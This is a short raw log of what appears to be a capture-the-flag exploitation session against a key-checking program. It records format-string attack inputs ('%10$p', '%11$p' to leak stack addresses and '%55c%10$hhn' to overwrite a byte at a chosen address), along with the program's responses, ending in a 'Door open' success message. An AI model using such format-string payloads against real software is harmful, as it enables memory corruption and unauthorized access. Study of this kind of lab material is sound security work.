[<] 
b'Please input your key :'
b'[>] %10$p'
[<] 
b'Your key is '
[<] 
b'0x7ffefec587e0\nAre you sure ? (Y/N)'
b'[>] N'
Target address: 0x7ffefec586fc
[<] 
b'Please input your key :'
b'[>] deadbeefdeadbeef\xfc\x86\xc5\xfe\xfe\x7f\x00\x00'
[<] 
b'Your key is '
[<] 
b'deadbeefdeadbeef\xfc\x86\xc5\xfe\xfe\x7f\nAre you sure ? (Y/N)'
b'[>] N'
[<] 
b'Please input your key :'
b'[>] %55c%10$hhn'
[<] 
b'Your key is '
[<] 
b'                                                      \xd0\nAre you sure ? (Y/N)'
b'[>] N'
[<] 
b'Please input your key :'
b'[>] %11$p'
[<] 
b'Your key is '
[<] 
b'0xab3700000000\nAre you sure ? (Y/N)'
b'[>] Y'
[<] 1024
b'Door open. OwO'
